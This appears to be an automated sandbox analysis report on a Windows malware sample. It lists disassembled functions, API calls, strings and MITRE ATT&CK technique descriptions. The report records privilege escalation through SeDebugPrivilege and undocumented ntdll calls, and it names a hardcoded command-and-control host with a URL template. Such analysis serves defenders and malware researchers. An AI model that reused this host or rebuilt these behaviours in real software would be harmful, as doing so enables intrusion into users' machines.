API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
String ID: C:\Users\user\AppData\Local\Temp\08660606.exe
API String ID: 2533558932-3412602479
Opcode ID: d6a5156caa767a148b6e47999ed69a925ced48cef80f6dbd21ea8bad08d8ac87
Instruction ID: e554bae27c190f202b45775ee6288dd92b024ddf5435f9788ac33738dbab6d54
Opcode Fuzzy Hash: d6a5156caa767a148b6e47999ed69a925ced48cef80f6dbd21ea8bad08d8ac87
Instruction Fuzzy Hash: 02F0BE78200304BBDF20A7B5EC8EF5A3B6CBB20300F010922B605E20E0DBB8DC599E51

Function 005914E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00591504
VirtualQuery.KERNEL32(005914E1,?,0000001C), ref: 00591525
ExitProcess.KERNEL32 ref: 0059157A

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 4f9d6c1e1a217fd6bea8abec76ea81ef0ff85facd359a123257b1529479296e4
Instruction ID: e7ea35f7ebcf656831289a35d58cbb2692ca79c9b99488bec0646c4b61184f03
Opcode Fuzzy Hash: 4f9d6c1e1a217fd6bea8abec76ea81ef0ff85facd359a123257b1529479296e4
Instruction Fuzzy Hash: 8B115E75900726DFCF20DFA5A888A797BA8FBA4750B13402BF402D3250D2388E46AF54

Function 0059615D Relevance: 2.6, APIs: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 005960DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00596189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005961A5

Memory Dump Source

Source File: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: e58d222e568507a0ca67a0397b30dddf0b980b0dc36f1c7111d56bcfc4e05868
Instruction ID: d2219569b59ac13a85aee85e96c122d996e72ca380f45a67b80a5c6b3d2606c3
Opcode Fuzzy Hash: e58d222e568507a0ca67a0397b30dddf0b980b0dc36f1c7111d56bcfc4e05868
Instruction Fuzzy Hash: 29118C32A00A49CFCF348F58CC817DD3BA2FF44300F690428DE8AAB291DB716948CB84

Non-executed Functions

Function 0059119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,005913EF), ref: 005911AB
OpenProcessToken.ADVAPI32(00000000,00000028,005913EF,?,?,?,?,?,?,005913EF), ref: 005911BB
AdjustTokenPrivileges.ADVAPI32(005913EF,00000000,?,00000010,00000000,00000000), ref: 005911EB
CloseHandle.KERNEL32(005913EF), ref: 005911FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,005913EF), ref: 00591203

Strings

C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 005911A5

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe
API String ID: 75692138-2612645121
Opcode ID: 640bfa30f255cd8336b93d2bb74ea013aed0a9de0b1b4fc76e0f2e7c1b81fb16
Instruction ID: b593b61bf6890ea86991a3f3af6da56687f9675b5dc2d4546f2cfa36da1c8998
Opcode Fuzzy Hash: 640bfa30f255cd8336b93d2bb74ea013aed0a9de0b1b4fc76e0f2e7c1b81fb16
Instruction Fuzzy Hash: 3401E4B5900209FFDB00DFE5CD89AAEBFB8FB14305F10446AE606A2250D7719F48EB50

Function 0059239D Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 005923CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00592464
GetFileSize.KERNEL32(00000000,00000000), ref: 00592472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 005924A8
memset.MSVCRT ref: 005924B9
strrchr.MSVCRT ref: 005924C9
wsprintfA.USER32 ref: 005924DE
strrchr.MSVCRT ref: 005924ED
memset.MSVCRT ref: 005924F2
memset.MSVCRT ref: 00592505
wsprintfA.USER32 ref: 00592524
Sleep.KERNEL32(000007D0), ref: 00592535
Sleep.KERNEL32(000007D0), ref: 0059255D
memset.MSVCRT ref: 0059256E
wsprintfA.USER32 ref: 00592585
memset.MSVCRT ref: 005925A6
wsprintfA.USER32 ref: 005925CA
Sleep.KERNEL32(000007D0), ref: 005925D0
Sleep.KERNEL32(000007D0,?,?), ref: 005925E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005925FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00592611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00592642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0059265B
SetEndOfFile.KERNEL32 ref: 0059266D
CloseHandle.KERNEL32(00000000), ref: 00592676
RemoveDirectoryA.KERNEL32(?), ref: 00592681

Strings

%s\, xrefs: 0059257F
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 005925C4
-ibck, xrefs: 005925BA
%s%s, xrefs: 005924D8
%s X -ibck "%s" "%s\", xrefs: 0059251E
C:\Users\user\AppData\Local\Temp\, xrefs: 005923B1, 005923B6, 005924CD
C:\Users\user\AppData\Local\Temp\08660606.exe, xrefs: 00592519, 005925BF

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\08660606.exe
API String ID: 2203340711-3628705401
Opcode ID: ee8ff0edd9bfa623fca1eadf4c9b7d75966adfb8b85b757e24259d1afaae031b
Instruction ID: 76e7c0597b4a9b944d212ab86e25cad8db67a51091f613513399b002ac2ece87
Opcode Fuzzy Hash: ee8ff0edd9bfa623fca1eadf4c9b7d75966adfb8b85b757e24259d1afaae031b
Instruction Fuzzy Hash: B6817EB1508345BBDB10DF60DC89EABBBECFB98704F00091AF685D21A0D7749A49DB66

Function 0059120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00591400), ref: 00591226
GetProcAddress.KERNEL32(00000000), ref: 0059122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00591400), ref: 0059123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00591400), ref: 00591250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00591400), ref: 0059129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00591400), ref: 005912B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,00591400), ref: 005912F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00591400), ref: 0059130A

Strings

ntdll.dll, xrefs: 00591219
ZwQuerySystemInformation, xrefs: 00591212
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00591262

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-4221281799
Opcode ID: 6c7aa24fa86b6947f917f244e3f875d8c595ec5ff8616aec807f6b92345358e2
Instruction ID: 1fc4b0d754f5f649a2251dc918e01fafac13c1c7f1bae284295149446d38e1f2
Opcode Fuzzy Hash: 6c7aa24fa86b6947f917f244e3f875d8c595ec5ff8616aec807f6b92345358e2
Instruction Fuzzy Hash: A121E635605722EBDF20AF66CC08B6BBEA8FB85B40F450929F546D6240C770DA44C7A9

Function 0059189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 005918B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75570F00,76C08400), ref: 005918D3
CloseHandle.KERNEL32(I%Y), ref: 005918E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 005918F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00591901
CloseHandle.KERNEL32(?), ref: 0059190A

Strings

I%Y, xrefs: 005918E0

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%Y
API String ID: 876959470-2051954410
Opcode ID: a3ed713327dd86198ab15e2a7750a04e575460cae18a94c5bedc0435de3dd842
Instruction ID: 2e58b757e83add939923b112a99be8fea6f01cfb2e5c7dfbb729e374773c1ac7
Opcode Fuzzy Hash: a3ed713327dd86198ab15e2a7750a04e575460cae18a94c5bedc0435de3dd842
Instruction Fuzzy Hash: A0017C72901128BBCF21AB96DC4DDDFBF3DFF85720F104022FA15A51A0D6314A18DAA0

Function 0059185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76C08400,http://%s:%d/%s/%s,?,?,?,00591118), ref: 00591867
srand.MSVCRT ref: 00591878
rand.MSVCRT ref: 00591880
srand.MSVCRT ref: 00591890
rand.MSVCRT ref: 00591894

Strings

http://%s:%d/%s/%s, xrefs: 00591860
ddos.dnsnb8.net, xrefs: 00591862

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 858c64bf275c29b6a1b2b1b1a74ba589bcda6ab5372ad303dd8baa58e8cf43af
Instruction ID: 965c9a42c0e64a64d22e0370f0171c3667e6311d182e6d76e26b053adcf8f8d8
Opcode Fuzzy Hash: 858c64bf275c29b6a1b2b1b1a74ba589bcda6ab5372ad303dd8baa58e8cf43af
Instruction Fuzzy Hash: 8DE04877A10218FBD700A7F9EC4A99EBBACDE84161B110567F600D3254E575FE488AB4

Function 00592692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7556E800,?,?,005929DB,?,00000001), ref: 005926A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7556E800,?,?,005929DB,?,00000001), ref: 005926B5
lstrlen.KERNEL32(?), ref: 005926C4
??2@YAPAXI@Z.MSVCRT ref: 005926CE
lstrcpy.KERNEL32(00000004,?), ref: 005926E3
lstrcpy.KERNEL32(?,00000004), ref: 0059271F
??3@YAXPAX@Z.MSVCRT ref: 0059272D
SetEvent.KERNEL32 ref: 0059273C

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: c8ba80796a48aa709625fd7a06092d4ee7f510079c325713a9beff7fbb01e840
Instruction ID: 16ced4bf189944ceb1ac35a1a7715498fa7556d1dfae17b9e3ac62cc5e80e4ba
Opcode Fuzzy Hash: c8ba80796a48aa709625fd7a06092d4ee7f510079c325713a9beff7fbb01e840
Instruction Fuzzy Hash: 7A11793A501204FFCB319F94ED48C6A7FA9FBA4761B164017F85897120D7308D8AEF50

Function 00591B8A Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00591BCD
rand.MSVCRT ref: 00591BD8
memset.MSVCRT ref: 00591C43
memcpy.MSVCRT ref: 00591C4F
lstrcat.KERNEL32(?,.exe), ref: 00591C5D

Strings

.exe, xrefs: 00591C57

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe
API String ID: 122620767-4119554291
Opcode ID: b502151da8a2270250baeb6b0a56d17a09c471ea2e111b5889508ac318d6f645
Instruction ID: a71299689dd759911ee21ffa65911a76ffbd0a04d9a8a046371828a279fc7374
Opcode Fuzzy Hash: b502151da8a2270250baeb6b0a56d17a09c471ea2e111b5889508ac318d6f645
Instruction Fuzzy Hash: 4E21BB26E447B1AEDB2613356C45F6D3F46EFF3720F1B409AF4810B192D1640E8B9768

Function 0059139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 005913BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005913DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00591448

Part of subcall function 0059119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\MlpxPf.exe,?,?,?,?,?,?,005913EF), ref: 005911AB
Part of subcall function 0059119F: OpenProcessToken.ADVAPI32(00000000,00000028,005913EF,?,?,?,?,?,?,005913EF), ref: 005911BB
Part of subcall function 0059119F: AdjustTokenPrivileges.ADVAPI32(005913EF,00000000,?,00000010,00000000,00000000), ref: 005911EB
Part of subcall function 0059119F: CloseHandle.KERNEL32(005913EF), ref: 005911FA
Part of subcall function 0059119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,005913EF), ref: 00591203

Strings

SeDebugPrivilege, xrefs: 005913D3
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 005913A8

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SeDebugPrivilege
API String ID: 4123949106-1990086918
Opcode ID: 58bb43f85b96ae1811b5453d50bbceedbed44affe4d34933b45d7e261a4dd005
Instruction ID: 5ca1c1b797fc2cf5a7879db1ce5605ca6e0becf39b418eae306576aadcadb911
Opcode Fuzzy Hash: 58bb43f85b96ae1811b5453d50bbceedbed44affe4d34933b45d7e261a4dd005
Instruction Fuzzy Hash: 5E314075D0062BEAEF209BA58D49FEEBFB8FB88744F10446AE505B2141D730AE45CB64

Function 00591319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00591334
GetProcAddress.KERNEL32(00000000), ref: 0059133B
memset.MSVCRT ref: 00591359

Strings

ntdll.dll, xrefs: 0059132F
NtSystemDebugControl, xrefs: 0059132A

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 1e75068ff5dafeaf2611f5abe2bb4d00e575cb6c651d100a8c0705857e016bfd
Instruction ID: 53bd061e05c581c2988a378caa4e16d922146b0c9fd075d962a768433d159a38
Opcode Fuzzy Hash: 1e75068ff5dafeaf2611f5abe2bb4d00e575cb6c651d100a8c0705857e016bfd
Instruction Fuzzy Hash: 27016D7160071AFFDF10DFA4AC89D6FBFB8FB51318F00492AF902A2150E2708A19DA55

Function 00591DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00591E0B
lstrcpy.KERNEL32(?,00000001), ref: 00591E1C
strrchr.MSVCRT ref: 00591E2B
lstrcmpiA.KERNEL32(?,00594488), ref: 00591E48
lstrlen.KERNEL32(00594488), ref: 00591E53

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 73f242ec2e04c53f567ce73958641bda23682dd9af8e851a02c88b9675d4d647
Instruction ID: d951e33626b1384c9b4525a1108ac05ba179a397adcdfbbd86ec58560b715861
Opcode Fuzzy Hash: 73f242ec2e04c53f567ce73958641bda23682dd9af8e851a02c88b9675d4d647
Instruction Fuzzy Hash: 2101FE72904226AFDF105760DC4DFE67FDCFB14350F050067D945D3090E6749E898B94

Function 00596014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0059603C
GetProcAddress.KERNEL32(00000000,00596064), ref: 0059604F

Strings

kernel32.dll, xrefs: 0059603B

Memory Dump Source

Source File: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 335329871ecbef117560c581236496d2564772eb3f9c327adcab12014dd01edb
Instruction ID: 47cdfe37bb09df6bfe19a02511365d22972be7385e956bd6f2b590bd1e468a94
Opcode Fuzzy Hash: 335329871ecbef117560c581236496d2564772eb3f9c327adcab12014dd01edb
Instruction Fuzzy Hash: 7FF0F0B11402998FEF708FA4CC88BDE3BE4FB05700F50042AEA0DCB281DB3486098B28

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
